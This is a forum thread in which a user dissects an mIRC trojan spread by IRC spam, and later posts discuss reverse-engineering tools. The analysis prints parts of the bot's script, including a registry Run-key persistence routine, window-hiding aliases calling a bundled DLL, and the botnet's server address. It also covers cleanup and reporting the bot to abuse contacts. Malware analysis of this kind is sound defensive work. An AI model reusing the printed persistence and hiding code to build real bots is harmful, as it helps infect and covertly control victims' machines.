IRC bot picked apart.

[ech0]

Ok I idle in a few channels on the Rizon IRC network. Rizon has been spammed to death latly with a botnet. So Im sitting infrunt of my machine and get bored. The spam msg promises Russin sex! I know this is just probibly a bot, but I do love my russin sex. Ok so the spam message tells me to go to the url. So I go there and right off the bat Im prompted to download movie.mpg.exe. That doesnt look like and russin porn video I've ever seen. I ignore that and look at the to pics/links of pron related material. Ooooohh theres the russin porn. I click a link. what do you know, that same exe is being surved to me. Meh, lets download'er and take a look.

So I save to my desktop and notice its just a self exstracting rar
file. So right of the bat I know these guys eather

A) Arnt that smart
B) Are lazy as hell
-They didnt even bother to pack it better or to scamble it with upx but thats another story all togeather.

Whats the best thing about these rars you ask? well simple. Right click and goto properties, then goto the comment tab. We see this.

;The comment below contains SFX script commands

Path=C:\WINDOWS\java\
SavePath
Setup=C:\WINDOWS\java\mirc.exe
Silent=1
Overwrite=2

This will tell us that there going to install to C:\windows\java and when the exe is done unpacking its going to run mirc.exe. Bingobango its a simple little mirc tojan....if only we could have seen thing comming... Ok, because its a rar file we can open it with rar right click on it again and click open with winrar.

Files in the rar!

bear.txt
Con32.dll
edih.dll
connects
mirc.exe

Right off the bat we know that this is mIRC. Mirc needs an ini file, a romte file that holds all the remote code. Click on these files and view them.

bear.txt snippit

; Set bY mC_YaRgIc ...

on *:start: {
celebili
timer12123 0 1 secret
timerasd 0 150 mC_YARGIc
mC_YARGIc
unset %*
.timer -i 1 2 NICK $_rands
.timer -i 1 2 ANICK $_rands
.timer -i 1 2 IDENTD ON $_rands
.timer -i 1 2 FULLNAME $_rands
.timer -i 1 2 EMAILADDR $_rands
.timer -i 0 60 _start
.timer -i 0 10 _reg
if $exists(up.reg) {
.remove up.reg
}

Yep, this file holds all the guys of the bot. The remote code.

Con32.dll snippet

www.klavye.com
Kenan
mkilhan
Crasus
mC_YaRgIc
4,1 -»«-15,1 0,1K15,1a0,1ç15,1a0,1k15,1 v44,1 -»«-15,1 www.Kacak.net 4,1-»«- 
mIRC v6.03 Khaled Mardam-Bey
mIRC 6.16 Khaled Mardam-Bey
mIRC v6.15 Khaled Mardam-Bey
mIRC v6.14 Khaled Mardam-Bey
mIRC v6.12 Khaled Mardam-Bey
mIRC v6.11 Khaled Mardam-Bey
mIRC v6.1 Khaled Mardam-Bey

A version file. So if other clients ctcp version this bot they will get diffrent client version replys. Tipical.

Connects snippet

[warn]
fserve=on
dcc=off
[dirs]
logdir=....\
waves=......\
midis=......\
mp3s=......\
wmas=......\
oggs=......\
[options]
n0=0,0,0,1,0,0,300,0,0,0,1,0,0,0,2,0,0,2,0,0,4096,0,1,0,0,0,1,1,0,50,0,1
n1=5,100,0,0,0,0,0,0,2,1,0,1,0,0,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0
n2=0,0,0,1,1,1,1,1,0,60,120,0,0,1,0,0,1,1,0,120,20,10,0,1,1,0,0,1,0,0,0,0,0
n3=5000,0,0,0,0,0,1,1,0,1,0,1,0,0,0,1,3,1,0,1,0,0,0,0,1,1,0,23,0,0,1,3,180,0
n4=1,0,1,0,0,3,9999,0,0,0,1,0,1024,0,1,99,60,0,0,0,3,0,0,0,1,5000,1,5,0,0,3,0,1,1
n5=1,1,1,1,1,1,1,1,1,1,6667,0,0,0,0,0,1,0,300,30,10,0,1,26,0,0,1,8192,1,0,0,82,0
n6=0,0,12,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0,100,1,1,0,0,1,0,0,4,1,0,1
n7=0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,1,70,0,3,0,1,1,1,1,1,0,0,0,0,1,1,1,1

Theres our mIrc.ini file.

Edih.dll snippet

MZ?   ÿÿ ? @ � º ? �!?
L�!This program cannot be run in DOS mode. $

?�Ÿ�ö?ñ?ö?ñ?ö?ñ??ú???ñ?u?ÿ?â?ñ?ö?ð???ñ???â?ó?ñ??û???ñ??õ???ñ?Richö?ñ? PE L
 mÈ?< Ã* !

 [? [? FÀ  p      �        Ã K Â 

hmmmm this is an actuall dll file. Wounder what it does? View the contents of bear.txt
**NOTE** everything with bold after it is my description of what it does.

; Set bY mC_YaRgIc ...

on *:start: {
celebili Calls an ailias
timer12123 0 1 secret Calls an ailias every 1 second
timerasd 0 150 mC_YARGIc Calls an ailias every 2.5 miniuts
mC_YARGIc Calls an ailias
unset %* Unsets all varibles
.timer -i 1 2 NICK $_rands Timer sets the nick to something random
.timer -i 1 2 ANICK $_rands timer sets the alt nick to something random
.timer -i 1 2 IDENTD ON $_rands timer sets the identd nick to something random
.timer -i 1 2 FULLNAME $_rands timer sets the fullname to something random
.timer -i 1 2 EMAILADDR $_rands timer sets the email address to something random
.timer -i 0 60 _start Calls an ailias
.timer -i 0 10 _reg Calls an ailias
if $exists(up.reg) {
.remove up.reg Deletes up.reg
}
write up.reg REGEDIT4
write up.reg [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] Makes a reg file
write up.reg "Startup"=" $+ $nopath($mircexe) $+ "
_reg
}
on *:exit: {
run -n regedit /s up.reg When mirc closes it runs regedit to slienty (/s) run that regfile again
run $nopath($mircexe) so mirc will start again on boot.
}
on *:connect: {
if $serverip == %serverip { if/when mirc connects to the server join %join
.timer -i 1 5 JOIN %join
}
}
on *:disconnect: { part all channels and rejoin server
partall
server
}

There was alot of code here, but it was all the bot code. basicly remote commands for the 'admins' of this bot. !spam would spam, !clone would load more clones, !server would change server and stuff like that. I dont want more spam so Im not going to post all the code

alias _servmessage {
if $server {
if m isincs $chan(%join).mode && $me !isvoice %join { join channel
return
}
scid 1 .msg %join $1- join channel and hide the channel windo in mirc so the user cant see it.
}
}
alias mC_YARGIc {
scid -a window -hn "Status Window" hide the status window. So the user can see it or do anything.
}
alias celebili { .echo Kenan $dll(edih.dll, do_ShowWindow, $window(-2).hwnd 0) }
alias secret { if ($appstate != hidden) { .echo hidden $dll(edih.dll, do_ShowWindow, $window(-2).hwnd 0) } }
alias _start {
if !%readed {
_opensocks
}
}

The celebili code above hides mirc from the desktop. the secret code states that if the mirc isnt hidden to then hide it!

The rest of this file was just more remote code that im not going to publish.

Open up connects and look for this line. host=208.53.162.102SERVER:208.53.162.102:6667. Theres the server this bot connects

too. Lets open our IRC client and connect to it. When we connect we get irc.mkilhan.com from the MOTD (Message Of The Day - the IRC servers message) So we know that this server is mkilhan.com. Lets goto there website and take a look. Nope nothing really of any use there.
ok lets copy a mirc.exe into that C:\windows\java dir and open up the bear.txt and edit it so it doesnt do anything nasty when we connect. Im going to remove all the hidden/reg stuff and show you what it looks like when were done.

on *:start: {
unset %* .timer -i 1 2 NICK $_rands
.timer -i 1 2 ANICK $_rands
.timer -i 1 2 IDENTD ON $_rands
.timer -i 1 2 FULLNAME $_rands
.timer -i 1 2 EMAILADDR $_rands
.timer -i 0 60 _start
.timer -i 0 10 _reg


Also go down to these lines so we can edit them to what I have so we can see whats going on when we connect


alias mC_YARGIc {
echo Status Window not hidden anymore we wana see stuff
}
alias celebili { .echo celebili } [b]dont need that hide dll. and will see when that alias is called
alias secret { if ($appstate != hidden) { .echo hidden } } same as above
alias _start {
if !%readed {
echo _opensocks we dont need that. lets just open that.
}
}

Ok so now we run the mirc.exe. We connect to the network then join #intikam. Interesting. Look at all those bots, theres gotta be 100 or so. Lets whos the admins, there admins so there hostmasks are masked. Meh, we gottem anyways. Lets do a /list so we can see other channels. Theres just 4 or so. Nothing special. At this point they noticed one of there bots snooping
around there network and killed me with a kiline. Guess I'm not wanted there.

Clean up!
ok delete those files from the java dir.then open regedit and goto

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and delete the mirc entry.

Closing!

Ok this bot was simple, it would be more effective if the bot was packed better. Thus would have been a little harder to pick up but not very. Also they should have used the %windir% varable instead of C:\windows so the bout would work on more os's. They shouldnt have used there IRC nicks as aliases. After I did this expairement I whois'ed there ips and emailed the abuse account about for the subnets for boath the webhosting site and the irc network and told them about the bot. Might not do anything but still. I could have gone father and tryd to ctcp chat the admins then used netstat to find there ips. Meh, I dont really care. Im glad I got to take a look at what there doing and how all this stuff works. I hope some one finds this info usefull or entertaining. It just gos to show you that the promise of free sex on the internet is usaully just that.

One More Thing!
If you have ever talked to me you know I cant spell and my grammer sucks. I tryd to spell check with google toolbar, nothing came up. My OpenOffice isnt working as it should so there might be some spelling mistakes. FOR THIS IM SORRY!

[Mirror]

Ah, gotta love mIRC coding, so easy to do and so many options. Yeah, nice job picking this apart. I hate botnets. Alot. But it's always fun to mess around with code. Either way, very very interesting, I used to dabble alot in mIRC bots and stuff but I stopped doing that a while ago, so many IRC networks have gotten so... bad because of all the bots.

[thehorse13]

I've disected several variants of this bot back in early August. It's been in circulation since early last summer and other variants actually carry the mirc.ini file with it along with a transparent ico file so that when mIRC fires, the user doesn't see it in the system tray.

You can find this bot in a bot library out on the net. All you have to do is DL the bot kit and modify it to your liking. I found it when some dummy left a tag in one of the files pointing back to where he got the code from. Needless to say, that site is no longer active. The downside is that 10 more took its place the next hour.

This is a very nicely laid out disect. I have to produce a similar technical report each time we find an unknown bot in our environment. I'm currently looking for able bodies who can do this not just for simple bots like this one but for more complex bots that use various packagers such as Yoda, UPX, etc.. Expert use of IDAPro (Nice Hex editor & reverse engineering app) and ASM (Assembler) are certainly a plus. Lookin for a job?

[ech0]

Sounds like fun. I have experience with compiling bots, then packing them with UPX (used Yoda before), and scrambling the headers. I really haven't really travelled the path of recompiling them that far other then mIRC bots. Mainly because I know the basics of Mirc scripting and how they try and install Iroffer/ftp execs. I can get sources for old bots like Phatbot/Stoney/DSNX and so on. Honestly this is quickly becoming a hobby of mine. I love the cat and mouse game with them. How the authors try and hide, load, run, and propagate the bots is very interesting to me. Id be happy to help, I just might need a push in the right direction to get all the tools and such for the bigger bots. I would love to pick apart the q7897237823793.tmp bots that sit in my temp files from time to time.

[thehorse13]

Grab yourself a copy of IDAPro (or any other full functional hex editor) and run over to your favorite bookstore and get a book on ASM. Also, download BINTEXT to pan through binaries to find any text that may offer some insight into what the bot does. This is similar to the STRINGS command in linux.

If you need a push, shoot me a PM from time to time and I would be happy to point you in the right direction.

[phishphreek]

and run over to your favorite bookstore and get a book on ASM

May I recommend Assembly Language for Intel- Based Computers by Kip R. Irvine
http://www.amazon.com/gp/product/013...104463-4776134

That is one of the books that I used in a computer organization class.

I'm not sure why... but ASM for motorolla processors is a bit easier to learn. Maybe its because I have more experience with that... but its easy enough to switch back and forth. The concepts are pretty similar... just the instruction set op codes and operands are different.

TH: Have you ever messed with OllyDbg?
http://www.ollydbg.de/

What do you think of it vs. IDAPro?

Ahh... ASM... brings back many memories of sleepless nights and burned fingers from solder... We had to build our own I/O to interface with the processors. Fun Fun...